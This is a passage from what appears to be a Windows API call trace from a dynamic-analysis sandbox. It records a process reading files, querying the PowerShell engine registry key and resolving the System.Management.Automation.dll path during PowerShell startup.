lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.205] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.205] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.205] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.205] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.205] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.205] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.206] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.206] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.206] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.206] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.206] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.207] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.207] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.207] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.207] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.207] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.207] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.208] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.208] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.208] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.208] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.208] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.208] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.209] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0xf37, lpOverlapped=0x0) returned 1 [0068.209] ReadFile (in: hFile=0x314, lpBuffer=0x36729d7, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x36729d7*, lpNumberOfBytesRead=0x12cff8*=0x0, lpOverlapped=0x0) returned 1 [0068.209] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x0, lpOverlapped=0x0) returned 1 [0068.209] CloseHandle (hObject=0x314) returned 1 [0068.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0068.209] SetErrorMode (uMode=0x1) returned 0x1 [0068.209] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12cfa0 | out: lpFileInformation=0x12cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0068.209] SetErrorMode (uMode=0x1) returned 0x1 [0068.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0068.210] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d088 | out: phkResult=0x12d088*=0x314) returned 0x0 [0068.210] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d00c, lpData=0x0, lpcbData=0x12d008*=0x0 | out: lpType=0x12d00c*=0x1, lpData=0x0, lpcbData=0x12d008*=0x56) returned 0x0 [0068.210] CoTaskMemAlloc (cb=0x5a) returned 0x23eaa0 [0068.210] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfdc, lpData=0x23eaa0, lpcbData=0x12cfd8*=0x56 | out: lpType=0x12cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cfd8*=0x56) returned 0x0 [0068.210] CoTaskMemFree (pv=0x23eaa0) [0068.210] RegCloseKey (hKey=0x314) returned 0x0 [0068.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0068.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0068.220] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x1a16ce66, Data2=0xbb47, Data3=0x4677, Data4=([0]=0x8a, [1]=0x1a, [2]=0x7d, [3]=0xd6, [4]=0x44, [5]=0x54, [6]=0xeb, [7]=0x6e))) returned 0x0 [0068.220] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xfe897662, Data2=0x82c1, Data3=0x4663, Data4=([0]=0x9e, [1]=0x4, [2]=0x8c, [3]=0x1b, [4]=0x8b, [5]=0xcb, [6]=0x5a, [7]=0x17))) returned 0x0 [0068.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.270] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x39147b8, Data2=0x54e6, Data3=0x4163, Data4=([0]=0x8a, [1]=0x75, [2]=0xd2, [3]=0x1c, [4]=0x78, [5]=0x43, [6]=0x38, [7]=0xca))) returned 0x0 [0068.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.272] VirtualQuery (in: lpAddress=0x12b2c0, lpBuffer=0x12c180, dwLength=0x30 | out: lpBuffer=0x12c180*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.272] VirtualQuery (in: lpAddress=0x12b350, lpBuffer=0x12c210, dwLength=0x30 | out: lpBuffer=0x12c210*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.273] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.274] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.274] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.274] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: 